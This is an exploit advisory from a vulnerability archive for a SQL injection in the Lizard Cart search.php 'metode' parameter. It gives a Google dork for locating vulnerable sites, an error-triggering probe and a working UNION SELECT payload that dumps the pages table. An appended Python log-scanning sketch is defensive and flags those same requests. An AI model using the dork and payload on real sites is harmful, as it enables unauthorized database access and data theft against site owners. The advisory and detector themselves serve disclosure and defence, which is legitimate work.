Lizard Cart SQL Injection

2012.03.06
Credit: Number 7
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: [lizard cart SQLi (search.php)]
# Google Dork: [inurl:search.php+intitle:"Lizard Cart"+intext:"Search Results:"]
# Date: [05-03-2012]
# Author: [Number 7]
# Software Link: [http://sourceforge.net/projects/lizardcart/files/latest/download?source=directory]
# Version: [pp104]
# Tested on: [Windows]
_____________________________________________________________________________________________

Usage:

http://localhost/liza/search.php?metode=1'

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in C:\AppServ\www\liza\search.php on line 15

http://localhost/liza/search.php?metode=[SQLi]

search.php?metode=-1+union+select+1,2,concat(id,0x3e,page_title,0x3e,page_content),4,5,6,7,8+from+pages--

Demo:

http://localhost/liza/search.php?metode=-1+union+select+1,2,concat(id,0x3e,page_title,0x3e,page_content),4,5,6,7,8+from+pages--
_____________________________________________________________________________________________
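
Detection sketch for the requests shown above. This is an added example, not part of the original advisory or of Lizard Cart's code. It assumes a common/combined-format web access log and that a legitimate metode value is a short unsigned integer; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate metode value is a short unsigned integer.
VALID_METODE = re.compile(r"\d{1,9}")
# Tokens seen in the advisory's requests; used only to label a hit.
SQL_TOKENS = re.compile(r"\bunion\b|\bselect\b|\bconcat\s*\(|--|'|0x[0-9a-f]+", re.I)


def check_line(line):
    """Return (verdict, metode_value) for a search.php request, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/search.php"):
        return None
    # parse_qs decodes %xx escapes and turns '+' into a space.
    values = parse_qs(url.query, keep_blank_values=True).get("metode")
    if values is None:
        return None
    for value in values:
        if not VALID_METODE.fullmatch(value):
            verdict = "sqli-pattern" if SQL_TOKENS.search(value) else "non-integer"
            return (verdict, value)
    return ("ok", values[0])


# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = """\
192.0.2.10 - - [06/Mar/2012:10:00:01 +0100] "GET /liza/search.php?metode=1 HTTP/1.1" 200 5120
192.0.2.11 - - [06/Mar/2012:10:00:07 +0100] "GET /liza/search.php?metode=1%27 HTTP/1.1" 200 312
192.0.2.11 - - [06/Mar/2012:10:00:09 +0100] "GET /liza/search.php?metode=-1+union+select+1,2,concat(id,0x3e,page_title,0x3e,page_content),4,5,6,7,8+from+pages-- HTTP/1.1" 200 9001
192.0.2.12 - - [06/Mar/2012:10:00:12 +0100] "GET /liza/index.php HTTP/1.1" 200 2048
192.0.2.13 - - [06/Mar/2012:10:00:15 +0100] "GET /liza/search.php?metode=abc HTTP/1.1" 200 300
"""


def scan(log_text):
    """Return [(line_number, verdict, value)] for every flagged request."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        result = check_line(line)
        if result and result[0] != "ok":
            hits.append((n, result[0], result[1]))
    return hits

print(scan(SAMPLE_LOG))
```

The same allow-list rule (accept metode only when it is an integer) is the input check the application itself lacks; on the server side it belongs next to a parameterized query rather than in place of one.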

References:

http://sourceforge.net/projects/lizardcart/files/latest/download?source=directory



Copyright 2024, cxsecurity.com

 
